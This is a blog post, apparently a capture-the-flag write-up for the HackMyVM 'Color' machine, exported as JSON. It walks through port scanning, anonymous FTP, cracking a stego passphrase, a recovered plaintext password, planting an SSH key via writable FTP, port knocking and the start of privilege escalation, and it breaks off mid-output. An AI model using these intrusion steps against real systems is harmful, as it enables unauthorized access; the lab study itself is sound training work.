{"id":643,"date":"2024-04-27T15:18:28","date_gmt":"2024-04-27T07:18:28","guid":{"rendered":"http:\/\/162.14.82.114\/?p=643"},"modified":"2024-04-27T15:18:28","modified_gmt":"2024-04-27T07:18:28","slug":"hmv-_-color","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/643\/04\/27\/2024\/","title":{"rendered":"hmv[-_-]color"},"content":{"rendered":"<h1>Colors<\/h1>\n<pre><code class=\"language-text\">Hey hacker, I&#039;ve heard a lot about you and I&#039;ve been told you&#039;re good. \n\nThe FBI has hacked into my apache server and shut down my website. I need you to sneak in and retrieve the &quot;root.txt&quot; file. 
I left my credentials somewhere but I can&#039;t remember where.\n\nI will pay you well if you succeed, good luck hacker.<\/code><\/pre>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ rustscan -a 192.168.0.162 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. 
Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.162:21\nOpen 192.168.0.162:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-27 01:10 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nInitiating Ping Scan at 01:10\nScanning 192.168.0.162 [2 ports]\nCompleted Ping Scan at 01:10, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 01:10\nCompleted Parallel DNS resolution of 1 host. at 01:10, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 01:10\nScanning color (192.168.0.162) [2 ports]\nDiscovered open port 80\/tcp on 192.168.0.162\nDiscovered open port 21\/tcp on 192.168.0.162\nCompleted Connect Scan at 01:10, 0.00s elapsed (2 total ports)\nInitiating Service scan at 01:10\nScanning 2 services on color (192.168.0.162)\nCompleted Service scan at 01:10, 6.06s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.0.162.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:10\nNSE: [ftp-bounce 192.168.0.162:21] PORT response: 500 Illegal PORT command.\nCompleted NSE at 01:10, 0.81s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.02s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nNmap scan report for color (192.168.0.162)\nHost is up, received syn-ack (0.00048s latency).\nScanned at 2024-04-27 01:10:13 EDT for 7s\n\nPORT   STATE SERVICE REASON  
VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-r--r--    1 1127     1127            0 Jan 27  2023 first\n| -rw-r--r--    1 1039     1039            0 Jan 27  2023 second\n| -rw-r--r--    1 0        0          290187 Feb 11  2023 secret.jpg\n|_-rw-r--r--    1 1081     1081            0 Jan 27  2023 third\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.0.143\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 2\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n80\/tcp open  http    syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-server-header: Apache\/2.4.54 (Debian)\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\n|_http-title: Document\nService Info: OS: Unix\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:10\nCompleted NSE at 01:10, 0.02s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.55 seconds<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.162\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.162\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,html,php,zip,bak,jpg\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 295]\n\/manual               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.162\/manual\/]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ curl http:\/\/192.168.0.162\/\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n    &lt;title&gt;Document&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;img src=&quot;.\/seized.png&quot; alt=&quot;&quot;&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<h3>ftp<\/h3>\n<p>Log in anonymously:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ftp 192.168.0.162\nConnected to 192.168.0.162.\n220 (vsFTPd 3.0.3)\nName (192.168.0.162:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||12661|)\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        0            4096 Feb 20  2023 .\ndrwxr-xr-x    2 0        0            4096 Feb 20  2023 ..\n-rw-r--r--    1 1127     1127            0 Jan 27  
2023 first\n-rw-r--r--    1 1039     1039            0 Jan 27  2023 second\n-rw-r--r--    1 0        0          290187 Feb 11  2023 secret.jpg\n-rw-r--r--    1 1081     1081            0 Jan 27  2023 third\n226 Directory send OK.\nftp&gt; get first\nlocal: first remote: first\n229 Entering Extended Passive Mode (|||60245|)\n150 Opening BINARY mode data connection for first (0 bytes).\n     0        0.00 KiB\/s \n226 Transfer complete.\nftp&gt; wget *\n?Invalid command.\nftp&gt; mget *\nmget first [anpqy?]? \n229 Entering Extended Passive Mode (|||27429|)\n150 Opening BINARY mode data connection for first (0 bytes).\n     0        0.00 KiB\/s \n226 Transfer complete.\nmget second [anpqy?]? \n229 Entering Extended Passive Mode (|||27177|)\n150 Opening BINARY mode data connection for second (0 bytes).\n     0        0.00 KiB\/s \n226 Transfer complete.\nmget secret.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||51770|)\n150 Opening BINARY mode data connection for secret.jpg (290187 bytes).\n100% |***********************************************************************************************************|   283 KiB    8.74 MiB\/s    00:00 ETA\n226 Transfer complete.\n290187 bytes received in 00:00 (8.62 MiB\/s)\nmget third [anpqy?]? 
\n229 Entering Extended Passive Mode (|||7815|)\n150 Opening BINARY mode data connection for third (0 bytes).\n     0        0.00 KiB\/s \n226 Transfer complete.\nftp&gt; exit\n221 Goodbye.<\/code><\/pre>\n<p>Let&#039;s see what we got:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ls\nfirst  second  secret.jpg  third\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ cat first                 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ cat second \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ cat third \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ exiftool secret.jpg \nExifTool Version Number         : 12.23\nFile Name                       : secret.jpg\nDirectory                       : .\nFile Size                       : 283 KiB\nFile Modification Date\/Time     : 2023:02:11 12:35:33-05:00\nFile Access Date\/Time           : 2024:04:27 01:15:03-04:00\nFile Inode Change Date\/Time     : 2024:04:27 01:15:03-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : None\nX Resolution                    : 1\nY Resolution                    : 1\nImage Width                     : 735\nImage Height                    : 588\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 735x588\nMegapixels                      : 0.432\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ls -la\ntotal 292\ndrwxr-xr-x  2 kali kali   4096 Apr 27 01:15 .\ndrwxr-xr-x 75 kali kali   4096 Apr 27 01:08 
..\n-rw-r--r--  1 kali kali      0 Jan 27  2023 first\n-rw-r--r--  1 kali kali      0 Jan 27  2023 second\n-rw-r--r--  1 kali kali 290187 Feb 11  2023 secret.jpg\n-rw-r--r--  1 kali kali      0 Jan 27  2023 third<\/code><\/pre>\n<p>The three files have no content at all, so they look like a hint, and there are exactly three of them: <code>1127,1039,1081<\/code><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt secret.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: &quot;Nevermind&quot;        \n[i] Original filename: &quot;more_secret.txt&quot;.\n[i] Extracting to &quot;secret.jpg.out&quot;<\/code><\/pre>\n<p>Oho, let&#039;s take a look:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ cat secret.jpg.out 
\n&lt;-MnkFEo!SARTV#+D,Y4D&#039;3_7G9D0LFWbmBCht5&#039;AKYi.Eb-A(Bld^%E,TH.FCeu*@X0)&lt;BOr&lt;.BPD?sF!,R&lt;@&lt;&lt;W;Dfm15Bk2*\/F&lt;G+4+EV:*DBND6+EV:.+E).\/F!,aHFWb4\/A0&gt;E$\/g+)2+EV:;Dg*=BAnE0-BOr;qDg-#3DImlA+B)]_C`m\/1@&lt;iu-Ec5e;FD,5.F(&amp;Zl+D&gt;2(@W-9&gt;+@BRZ@q[!,BOr&lt;.Ea`Ki+EqO;A9\/l-DBO4CF`JUG@;0P!\/g*T-E,9H5AM,)nEb\/Zr\/g*PrF(9-3ATBC1E+s3*3`&#039;O.CG^*\/BkJ\\:<\/code><\/pre>\n<p>... Encryption\/decryption?<\/p>\n<pre><code class=\"language-text\">Twenty years from now you will be more disappointed by the things that you didn&#039;t do than by the ones you did do. So throw off the bowlines. Sail away from the safe harbor. Catch the trade winds in your sails. Explore. Dream. 
Discover.\npink:Pink4sPig$$<\/code><\/pre>\n<p>Hmm, I tried ssh but it failed; I tried ftp and it worked!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ftp 192.168.0.162\nConnected to 192.168.0.162.\n220 (vsFTPd 3.0.3)\nName (192.168.0.162:kali): pink\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||48922|)\n150 Here comes the directory listing.\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 .\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 ..\ndrwx------    2 1127     1127         4096 Feb 11  2023 green\ndrwx------    3 1000     1000         4096 Feb 11  2023 pink\ndrwx------    2 1081     1081         4096 Feb 20  2023 purple\ndrwx------    2 1039     1039         4096 Feb 11  2023 red\n226 Directory send OK.\nftp&gt; cd green\n550 Failed to change directory.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||56995|)\n150 Here comes the directory listing.\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 .\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 ..\ndrwx------    2 1127     1127         4096 Feb 11  2023 green\ndrwx------    3 1000     1000         4096 Feb 11  2023 pink\ndrwx------    2 1081     1081         4096 Feb 20  2023 purple\ndrwx------    2 1039     1039         4096 Feb 11  2023 red\n226 Directory send OK.\nftp&gt; cd pink\n250 Directory successfully changed.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||52190|)\n150 Here comes the directory listing.\ndrwx------    3 1000     1000         4096 Feb 11  2023 .\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 ..\nlrwxrwxrwx    1 1000     1000            9 Jan 27  2023 .bash_history -&gt; \/dev\/null\n-rwx------    1 1000     1000          220 Jan 27  2023 .bash_logout\n-rwx------    
1 1000     1000         3526 Jan 27  2023 .bashrc\n-rwx------    1 1000     1000          807 Jan 27  2023 .profile\ndrwx------    2 1000     1000         4096 Feb 11  2023 .ssh\n-rwx------    1 1000     1000         3705 Feb 11  2023 .viminfo\n-rw-r--r--    1 1000     1000           23 Feb 11  2023 note.txt\n226 Directory send OK.\nftp&gt; get note.txt\nlocal: note.txt remote: note.txt\n229 Entering Extended Passive Mode (|||51693|)\n150 Opening BINARY mode data connection for note.txt (23 bytes).\n100% |***********************************************************************************************************|    23        0.83 KiB\/s    00:00 ETA\n226 Transfer complete.\n23 bytes received in 00:00 (0.81 KiB\/s)\nftp&gt; exit\n221 Goodbye.<\/code><\/pre>\n<h3>Uploading a Public Key to Connect<\/h3>\n<p>It looks like we landed in a rather curious directory, something like a user home directory, so let&#039;s try uploading a public key to connect:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ cat note.txt      \nnothing to see here...\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ssh-keygen -t rsa -f \/home\/kali\/temp\/color\/color        \nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/color\/color\nYour public key has been saved in \/home\/kali\/temp\/color\/color.pub\nThe key fingerprint is:\nSHA256:yhuQMJNyxDYT7XLiekwiUPWwyy7w4EZ4Qzbb1xd9EeU kali@kali\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n| .o+o         oo.|\n| .*..+     .   o |\n|.oX+. .   . . . E|\n|o=oOoo .   . .   |\n|=o++* . S .      |\n|==oo + . .       |\n|.Bo . +          |\n|o o.   o         |\n| .    .          
|\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ mv color.pub authorized_keys\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ftp 192.168.0.162\nConnected to 192.168.0.162.\n220 (vsFTPd 3.0.3)\nName (192.168.0.162:kali): pink\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; cd pink\n250 Directory successfully changed.\nftp&gt; lls -la\n?Invalid command.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||16316|)\n150 Here comes the directory listing.\ndrwx------    3 1000     1000         4096 Feb 11  2023 .\ndrwxr-xr-x    6 0        0            4096 Jan 27  2023 ..\nlrwxrwxrwx    1 1000     1000            9 Jan 27  2023 .bash_history -&gt; \/dev\/null\n-rwx------    1 1000     1000          220 Jan 27  2023 .bash_logout\n-rwx------    1 1000     1000         3526 Jan 27  2023 .bashrc\n-rwx------    1 1000     1000          807 Jan 27  2023 .profile\ndrwx------    2 1000     1000         4096 Feb 11  2023 .ssh\n-rwx------    1 1000     1000         3705 Feb 11  2023 .viminfo\n-rw-r--r--    1 1000     1000           23 Feb 11  2023 note.txt\n226 Directory send OK.\nftp&gt; cd .ssh\n250 Directory successfully changed.\nftp&gt; put authorized_keys \nlocal: authorized_keys remote: authorized_keys\n229 Entering Extended Passive Mode (|||40469|)\n150 Ok to send data.\n100% |***********************************************************************************************************|   563       13.09 MiB\/s    00:00 ETA\n226 Transfer complete.\n563 bytes sent in 00:00 (500.73 KiB\/s)\nftp&gt; exit\n221 Goodbye.<\/code><\/pre>\n<p>Then connect as this user!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ chmod 600 color 
\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ssh pink@192.168.0.162 -i color                 \nssh: connect to host 192.168.0.162 port 22: Connection refused<\/code><\/pre>\n<p>Uh, I forgot that port 22 is not open... Doomed. Thinking back to the three ports above, let&#039;s try knocking on them:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ knock 192.168.0.162 1127 1039 1081 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ nmap 192.168.0.162                            \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-27 01:48 EDT\nNmap scan report for color (192.168.0.162)\nHost is up (0.00021s latency).\nNot shown: 997 closed tcp ports (conn-refused)\nPORT   STATE SERVICE\n21\/tcp open  ftp\n22\/tcp open  ssh\n80\/tcp open  http\n\nNmap done: 1 IP address (1 host up) scanned in 0.09 seconds<\/code><\/pre>\n<p>Awesome! Connect:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ ssh pink@192.168.0.162 -i color   \nssh: connect to host 192.168.0.162 port 22: Connection refused<\/code><\/pre>\n<p>Hmm...<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ rustscan -a 192.168.0.162 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. 
\\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.162:21\nOpen 192.168.0.162:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)<\/code><\/pre>\n<p>Why isn&#039;t it open... Let&#039;s try again:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ knock 192.168.0.162 1127 1039 1081\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ sudo nmap 192.168.0.162             \n[sudo] password for kali: \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-27 02:06 EDT\nNmap scan report for color (192.168.0.162)\nHost is up (0.00040s latency).\nNot shown: 997 closed tcp ports (reset)\nPORT   STATE SERVICE\n21\/tcp open  ftp\n22\/tcp open  ssh\n80\/tcp open  http\nMAC Address: 08:00:27:B0:F8:63 (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.59 seconds<\/code><\/pre>\n<p>Success!!!<\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Switching to html<\/h3>\n<pre><code class=\"language-bash\">pink@color:~$ cat .viminfo \n# This viminfo file was generated by Vim 8.2.\n# You may edit it if you&#039;re careful!\n\n# Viminfo version\n|1,4\n\n# Value of &#039;encoding&#039; when this file was written\n*encoding=utf-8\n\n# hlsearch on (H) or off (h):\n~h\n# Command Line History (newest to oldest):\n:x\n|2,0,1676139493,,&quot;x&quot;\n:q\n|2,0,1675200748,,&quot;q&quot;\n:q!\n|2,0,1675181824,,&quot;q!&quot;\n\n# Search String History (newest to oldest):\n\n# Expression History (newest to oldest):\n\n# Input Line History (newest to oldest):\n\n# Debug Line History (newest to oldest):\n\n# Registers:\n&quot;&quot;-     CHAR    0\n        #\n|3,1,36,0,1,0,1675181817,&quot;#&quot;\n\n# File marks:\n&#039;0  1  28  \/var\/www\/html\/sh.php\n|4,48,1,28,1676139493,&quot;\/var\/www\/html\/sh.php&quot;\n&#039;1  1  28  \/var\/www\/html\/a.php\n|4,49,1,28,1675200767,&quot;\/var\/www\/html\/a.php&quot;\n&#039;2  1  0  \/var\/www\/html\/a.php\n|4,50,1,0,1675200748,&quot;\/var\/www\/html\/a.php&quot;\n&#039;3  123  0  \/etc\/vsftpd.conf\n|4,51,123,0,1675181824,&quot;\/etc\/vsftpd.conf&quot;\n&#039;4  1  0  \/etc\/ftpusers\n|4,52,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n\n# Jumplist (newest first):\n-&#039;  1  28  
\/var\/www\/html\/sh.php\n|4,39,1,28,1676139493,&quot;\/var\/www\/html\/sh.php&quot;\n-&#039;  1  28  \/var\/www\/html\/a.php\n|4,39,1,28,1675200767,&quot;\/var\/www\/html\/a.php&quot;\n-&#039;  1  28  \/var\/www\/html\/a.php\n|4,39,1,28,1675200767,&quot;\/var\/www\/html\/a.php&quot;\n-&#039;  1  0  \/var\/www\/html\/a.php\n|4,39,1,0,1675200748,&quot;\/var\/www\/html\/a.php&quot;\n-&#039;  1  0  \/var\/www\/html\/a.php\n|4,39,1,0,1675200748,&quot;\/var\/www\/html\/a.php&quot;\n-&#039;  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  123  0  \/etc\/vsftpd.conf\n|4,39,123,0,1675181824,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  1  0  \/etc\/vsftpd.conf\n|4,39,1,0,1675181758,&quot;\/etc\/vsftpd.conf&quot;\n-&#039;  1  0  
\/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n-&#039;  1  0  \/etc\/ftpusers\n|4,39,1,0,1675181738,&quot;\/etc\/ftpusers&quot;\n\n# History of marks within files (newest to oldest):\n\n> \/var\/www\/html\/sh.php\n        *       1676139492      0\n        &quot;       1       28\n        ^       1       29\n        .       1       28\n        +       1       28\n\n> \/var\/www\/html\/a.php\n        *       1675200766      0\n        &quot;       1       28\n        ^       1       29\n        .       1       28\n        +       1       28\n\n> \/etc\/vsftpd.conf\n        *       1675181822      0\n        &quot;       123     0\n        .       
